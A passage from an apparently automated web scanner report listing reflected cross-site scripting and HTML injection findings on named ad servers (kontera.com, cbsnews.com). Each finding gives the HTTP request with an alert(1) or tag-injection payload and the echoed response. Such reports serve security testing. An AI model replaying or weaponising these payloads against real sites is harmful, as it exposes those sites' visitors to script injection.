User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 1953

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=113247&layout=adlinks&sId=1401&cb=1297647520&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(6);
reJs
...[SNIP]...
RequestId="37787202445334700";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html2c2dd";alert(1)//6cad627a8b3&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

1.193. http://kona5.kontera.com/KonaGet.js [rId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74fff"-alert(1)-"bf142052b was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KonaGet.js?u=1297647428875&p=113247&k=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.htmljpNNP3&al=1&l=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html&t=Is+the+army+tightening+its+grip+on+Egypt+%3F+-+Africa+%2C+World+-+The+Independent&m2=The+Independent+now+has+a+Google+Chrome+Extension+.+Get+the+latest+news+on+the+topics+you+like+%2C+direc&rId=074fff"-alert(1)-"bf142052b&rl=0&1=14&mod=65555&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 2004

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=113247&layout=adlinks&sId=1401&cb=1297647521&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(6);
reJs
...[SNIP]...
,157813,'army',512,1,"","39905;57830;7753");
addContentLink(560,1335360,'elections',537,1,"","39905;57830;7753");
}, "reaction response");
konaSafe(function(){
konaTweakMode=134299923;
konaRequestId="074fff"-alert(1)-"bf142052b";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html&dc_aff_id=");
onKonaReturn(
...[SNIP]...

1.194. http://mads.cbsnews.com/mac-ad [&adfile parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the &adfile request parameter is copied into the HTML document as plain text between tags. The payload 63eb8<a>ae9d22d54df was submitted in the &adfile parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?SP=16&_RGROUP=15001&NCAT=250%3a503544%3a&CNET-BRAND-ID=55&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=162&ASSET_HOST=adimg.cbsnews.com&PTYPE=8301&CNET-ONTOLOGY-NODE-ID=503544&&CID=20031629&&POS=200&ENG:DATETIME=2011.02.13.20.35.25&SYS:RQID=00phx1-ad-e21:4D586AC51D0143&&REFER_HOST=www.cbsnews.com&&&&&DVAR_INSTLANG=en%2dUS&DVAR_LB_MPU=1&&adfile=7074/11/445159_wc.ca63eb8<a>ae9d22d54df HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:45:31 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:45:31 GMT
Content-Length: 717

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="SP=16&_RGROUP=15001&NCAT=250%3a503544%3a&CNET-BRAND-ID=55&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=162&ASSET_HOST=adimg.cbsnews.com&PTYPE=8301&CNET-ONTOLO
...[SNIP]...
-ID=503544&&CID=20031629&&POS=200&ENG:DATETIME=2011.02.13.20.35.25&SYS:RQID=00phx1-ad-e21:4D586AC51D0143&&REFER_HOST=www.cbsnews.com&&&&&DVAR_INSTLANG=en%2dUS&DVAR_LB_MPU=1&&adfile=7074/11/445159_wc.ca63eb8<a>ae9d22d54df" _REQ_NUM="0" -->
...[SNIP]...

1.195. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload 6c6da<a>a48d6ff9148 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=806c6da<a>a48d6ff9148&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:11 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:11 GMT
Content-Length: 591

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=806c6da<a>a48d6ff9148&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='80664869148' CNET-PTYPE='00' POS='100' NCAT='250:503544:' CNET-PARTNER-ID='1' DVAR_
...[SNIP]...

1.196. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into a JavaScript inline comment. The payload 68943*/alert(1)//59a571ec2f7 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=168943*/alert(1)//59a571ec2f7&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:07 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:07 GMT
Content-Length: 572

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=168943*/alert(1)//59a571ec2f7&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='16894315957127' SPECIFIED. BEACON CALL FAILED. */;window.CBSI_PAGESTATE='1||;cbsnews.com;;|-1';/* MAC [r20101202-0915-v1-13-13-JsonEnco
...[SNIP]...

1.197. http://mads.cbsnews.com/mac-ad [BRAND parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1aa3'%3balert(1)//8fee192004 was submitted in the BRAND parameter. This input was echoed as b1aa3';alert(1)//8fee192004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b1aa3'%3balert(1)//8fee192004&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:49 GMT
Server: Apache/2.2
Content-Length: 1119
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:49 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b1aa3'%3balert(1)//8fee192004&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DV
...[SNIP]...
<img alt="" height="0" src="http://adlog.com.com/adlog/i/r=14617&amp;sg=1815&amp;o=250%253a503544%253a&amp;h=cn&amp;p=2&amp;b=55b1aa3';alert(1)//8fee192004&amp;l=en_US&amp;site=162&amp;pt=8301&amp;nd=503544&amp;pid=&amp;cid=20031629&amp;pp=100&amp;e=&amp;rqid=01phx1-ad-e18:4D5842B347B577&amp;orh=cbsnews.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppart
...[SNIP]...

1.198. http://mads.cbsnews.com/mac-ad [BRAND parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload b2ce6*/alert(1)//8b4283b85c0 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b2ce6*/alert(1)//8b4283b85c0&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:53 GMT
Server: Apache/2.2
Content-Length: 1118
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b2ce6*/alert(1)//8b4283b85c0&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.199. http://mads.cbsnews.com/mac-ad [CELT parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 18e49<a>b9fc646e6 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js18e49<a>b9fc646e6&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:48 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:35:48 GMT
Content-Length: 521

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js18e49<a>b9fc646e6&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" -->
...[SNIP]...

1.200. http://mads.cbsnews.com/mac-ad [CID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the CID request parameter is copied into a JavaScript inline comment. The payload ebef0*/alert(1)//0a018d77dd was submitted in the CID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629ebef0*/alert(1)//0a018d77dd&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:06 GMT
Server: Apache/2.2
Content-Length: 1113
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:06 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629ebef0*/alert(1)//0a018d77dd&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.201. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 7f73f*/alert(1)//b4ca9862b97 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US7f73f*/alert(1)//b4ca9862b97&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:03 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:03 GMT
Content-Length: 608

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US7f73f*/alert(1)//b4ca9862b97&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTAT
...[SNIP]...

1.202. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 9d43c<a>fd7ee7a98b4 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS9d43c<a>fd7ee7a98b4&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:52 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:36:52 GMT
Content-Length: 553

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS9d43c<a>fd7ee7a98b4&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1"
...[SNIP]...

1.203. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 59f48*/alert(1)//f3203b6ea8b was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS59f48*/alert(1)//f3203b6ea8b&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:45 GMT
Server: Apache/2.2
Content-Length: 1092
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:35:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS59f48*/alert(1)//f3203b6ea8b&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.wr
...[SNIP]...

1.204. http://mads.cbsnews.com/mac-ad [NCAT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload 62ddc*/alert(1)//5c07f31d8c0 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A62ddc*/alert(1)//5c07f31d8c0&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:25 GMT
Server: Apache/2.2
Content-Length: 1139
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:25 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A62ddc*/alert(1)//5c07f31d8c0&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.205. http://mads.cbsnews.com/mac-ad [NODE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the NODE request parameter is copied into a JavaScript inline comment. The payload 8af49*/alert(1)//09dcc35bef3 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=5035448af49*/alert(1)//09dcc35bef3&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:39 GMT
Server: Apache/2.2
Content-Length: 1114
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:39 GMT

